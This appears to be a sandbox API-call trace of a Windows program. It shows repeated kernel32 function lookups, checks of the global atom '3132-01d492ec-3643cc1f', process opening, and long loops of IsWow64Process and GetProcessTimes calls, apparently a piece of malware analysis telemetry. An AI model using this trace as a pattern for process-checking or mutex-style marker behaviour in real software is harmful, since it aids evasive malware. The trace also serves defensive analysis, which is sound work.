	[0120.255] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.256] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.256] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.256] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.256] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.256] CloseHandle (hObject=0x698) returned 1
	[0120.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.256] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.256] CloseHandle (hObject=0x698) returned 1
	[0120.256] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.256] CloseHandle (hObject=0x698) returned 1
	[0120.257] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.257] CloseHandle (hObject=0x698) returned 1
	[0120.257] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.257] CloseHandle (hObject=0x698) returned 1
	[0120.290] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.290] CloseHandle (hObject=0x698) returned 1
	[0120.290] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.290] CloseHandle (hObject=0x698) returned 1
	[0120.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.291] CloseHandle (hObject=0x698) returned 1
	[0120.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.291] CloseHandle (hObject=0x698) returned 1
	[0120.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.291] CloseHandle (hObject=0x698) returned 1
	[0120.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.291] CloseHandle (hObject=0x698) returned 1
	[0120.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.291] CloseHandle (hObject=0x698) returned 1
	[0120.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.292] CloseHandle (hObject=0x698) returned 1
	[0120.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.292] CloseHandle (hObject=0x698) returned 1
	[0120.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.292] CloseHandle (hObject=0x698) returned 1
	[0120.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.292] CloseHandle (hObject=0x698) returned 1
	[0120.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.292] CloseHandle (hObject=0x698) returned 1
	[0120.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.293] CloseHandle (hObject=0x698) returned 1
	[0120.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.293] CloseHandle (hObject=0x698) returned 1
	[0120.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.293] CloseHandle (hObject=0x698) returned 1
	[0120.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.293] CloseHandle (hObject=0x698) returned 1
	[0120.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.293] CloseHandle (hObject=0x698) returned 1
	[0120.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.294] CloseHandle (hObject=0x698) returned 1
	[0120.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.294] CloseHandle (hObject=0x698) returned 1
	[0120.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.294] CloseHandle (hObject=0x698) returned 1
	[0120.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.294] CloseHandle (hObject=0x698) returned 1
	[0120.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.295] CloseHandle (hObject=0x698) returned 1
	[0120.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.295] CloseHandle (hObject=0x698) returned 1
	[0120.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.295] CloseHandle (hObject=0x698) returned 1
	[0120.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.295] CloseHandle (hObject=0x698) returned 1
	[0120.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.295] CloseHandle (hObject=0x698) returned 1
	[0120.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.296] CloseHandle (hObject=0x698) returned 1
	[0120.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.296] CloseHandle (hObject=0x698) returned 1
	[0120.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.296] CloseHandle (hObject=0x698) returned 1
	[0120.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.297] CloseHandle (hObject=0x698) returned 1
	[0120.297] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.297] CloseHandle (hObject=0x698) returned 1
	[0120.297] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.297] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.297] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.298] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.298] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.298] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.298] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.298] CloseHandle (hObject=0x698) returned 1
	[0120.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.299] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.299] CloseHandle (hObject=0x698) returned 1
	[0120.299] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.299] CloseHandle (hObject=0x698) returned 1
	[0120.299] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.299] CloseHandle (hObject=0x698) returned 1
	[0120.299] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.299] CloseHandle (hObject=0x698) returned 1
	[0120.332] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.332] CloseHandle (hObject=0x698) returned 1
	[0120.332] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.332] CloseHandle (hObject=0x698) returned 1
	[0120.332] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.332] CloseHandle (hObject=0x698) returned 1
	[0120.332] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.332] CloseHandle (hObject=0x698) returned 1
	[0120.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.333] CloseHandle (hObject=0x698) returned 1
	[0120.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.333] CloseHandle (hObject=0x698) returned 1
	[0120.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.333] CloseHandle (hObject=0x698) returned 1
	[0120.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.333] CloseHandle (hObject=0x698) returned 1
	[0120.333] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.333] CloseHandle (hObject=0x698) returned 1
	[0120.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.334] CloseHandle (hObject=0x698) returned 1
	[0120.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.334] CloseHandle (hObject=0x698) returned 1
	[0120.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.334] CloseHandle (hObject=0x698) returned 1
	[0120.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.334] CloseHandle (hObject=0x698) returned 1
	[0120.334] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.334] CloseHandle (hObject=0x698) returned 1
	[0120.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.335] CloseHandle (hObject=0x698) returned 1
	[0120.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.335] CloseHandle (hObject=0x698) returned 1
	[0120.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.335] CloseHandle (hObject=0x698) returned 1
	[0120.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.335] CloseHandle (hObject=0x698) returned 1
	[0120.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.335] CloseHandle (hObject=0x698) returned 1
	[0120.335] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.336] CloseHandle (hObject=0x698) returned 1
	[0120.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.336] CloseHandle (hObject=0x698) returned 1
	[0120.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.336] CloseHandle (hObject=0x698) returned 1
	[0120.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.336] CloseHandle (hObject=0x698) returned 1
	[0120.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.336] CloseHandle (hObject=0x698) returned 1
	[0120.336] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.337] CloseHandle (hObject=0x698) returned 1
	[0120.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.337] CloseHandle (hObject=0x698) returned 1
	[0120.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.337] CloseHandle (hObject=0x698) returned 1
	[0120.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.337] CloseHandle (hObject=0x698) returned 1
	[0120.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.338] CloseHandle (hObject=0x698) returned 1
	[0120.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.338] CloseHandle (hObject=0x698) returned 1
	[0120.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.338] CloseHandle (hObject=0x698) returned 1
	[0120.338] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.338] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.339] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.339] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.339] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.339] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.340] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.340] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.340] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.340] CloseHandle (hObject=0x698) returned 1
	[0120.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.340] CloseHandle (hObject=0x698) returned 1
	[0120.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.340] CloseHandle (hObject=0x698) returned 1
	[0120.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.341] CloseHandle (hObject=0x698) returned 1
	[0120.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.341] CloseHandle (hObject=0x698) returned 1
	[0120.373] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.373] CloseHandle (hObject=0x698) returned 1
	[0120.373] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.374] CloseHandle (hObject=0x698) returned 1
	[0120.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.374] CloseHandle (hObject=0x698) returned 1
	[0120.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.374] CloseHandle (hObject=0x698) returned 1
	[0120.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.374] CloseHandle (hObject=0x698) returned 1
	[0120.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.374] CloseHandle (hObject=0x698) returned 1
	[0120.374] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.375] CloseHandle (hObject=0x698) returned 1
	[0120.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.375] CloseHandle (hObject=0x698) returned 1
	[0120.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.375] CloseHandle (hObject=0x698) returned 1
	[0120.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.375] CloseHandle (hObject=0x698) returned 1
	[0120.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.375] CloseHandle (hObject=0x698) returned 1
	[0120.375] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.375] CloseHandle (hObject=0x698) returned 1
	[0120.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.376] CloseHandle (hObject=0x698) returned 1
	[0120.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.376] CloseHandle (hObject=0x698) returned 1
	[0120.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.376] CloseHandle (hObject=0x698) returned 1
	[0120.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.376] CloseHandle (hObject=0x698) returned 1
	[0120.376] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.376] CloseHandle (hObject=0x698) returned 1
	[0120.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.377] CloseHandle (hObject=0x698) returned 1
	[0120.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.377] CloseHandle (hObject=0x698) returned 1
	[0120.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.377] CloseHandle (hObject=0x698) returned 1
	[0120.377] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.378] CloseHandle (hObject=0x698) returned 1
	[0120.378] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.378] CloseHandle (hObject=0x698) returned 1
	[0120.378] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.378] CloseHandle (hObject=0x698) returned 1
	[0120.378] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.378] CloseHandle (hObject=0x698) returned 1
	[0120.378] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.378] CloseHandle (hObject=0x698) returned 1
	[0120.378] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.379] CloseHandle (hObject=0x698) returned 1
	[0120.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.379] CloseHandle (hObject=0x698) returned 1
	[0120.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.379] CloseHandle (hObject=0x698) returned 1
	[0120.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.379] CloseHandle (hObject=0x698) returned 1
	[0120.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.379] CloseHandle (hObject=0x698) returned 1
	[0120.379] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.380] CloseHandle (hObject=0x698) returned 1
	[0120.380] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.380] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.380] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.380] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.381] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.381] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.381] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.381] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.381] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.381] CloseHandle (hObject=0x698) returned 1
	[0120.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.381] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.381] CloseHandle (hObject=0x698) returned 1
	[0120.381] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.381] CloseHandle (hObject=0x698) returned 1
	[0120.382] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.382] CloseHandle (hObject=0x698) returned 1
	[0120.382] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.382] CloseHandle (hObject=0x698) returned 1
	[0120.418] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.418] CloseHandle (hObject=0x698) returned 1
	[0120.418] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.418] CloseHandle (hObject=0x698) returned 1
	[0120.418] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.418] CloseHandle (hObject=0x698) returned 1
	[0120.418] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.418] CloseHandle (hObject=0x698) returned 1
	[0120.418] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.419] CloseHandle (hObject=0x698) returned 1
	[0120.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.419] CloseHandle (hObject=0x698) returned 1
	[0120.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.419] CloseHandle (hObject=0x698) returned 1
	[0120.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.419] CloseHandle (hObject=0x698) returned 1
	[0120.419] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.420] CloseHandle (hObject=0x698) returned 1
	[0120.420] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.420] CloseHandle (hObject=0x698) returned 1
	[0120.420] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.420] CloseHandle (hObject=0x698) returned 1
	[0120.420] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.420] CloseHandle (hObject=0x698) returned 1
	[0120.420] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.420] CloseHandle (hObject=0x698) returned 1
	[0120.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.421] CloseHandle (hObject=0x698) returned 1
	[0120.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.421] CloseHandle (hObject=0x698) returned 1
	[0120.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.421] CloseHandle (hObject=0x698) returned 1
	[0120.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.421] CloseHandle (hObject=0x698) returned 1
	[0120.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.421] CloseHandle (hObject=0x698) returned 1
	[0120.421] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.421] CloseHandle (hObject=0x698) returned 1
	[0120.422] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.422] CloseHandle (hObject=0x698) returned 1
	[0120.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.425] CloseHandle (hObject=0x698) returned 1
	[0120.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.425] CloseHandle (hObject=0x698) returned 1
	[0120.425] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.426] CloseHandle (hObject=0x698) returned 1
	[0120.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.426] CloseHandle (hObject=0x698) returned 1
	[0120.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.426] CloseHandle (hObject=0x698) returned 1
	[0120.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.426] CloseHandle (hObject=0x698) returned 1
	[0120.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.426] CloseHandle (hObject=0x698) returned 1
	[0120.426] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.427] CloseHandle (hObject=0x698) returned 1
	[0120.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.427] CloseHandle (hObject=0x698) returned 1
	[0120.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.427] CloseHandle (hObject=0x698) returned 1
	[0120.427] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.427] CloseHandle (hObject=0x698) returned 1
	[0120.427] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.428] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.428] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.428] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.429] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.429] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
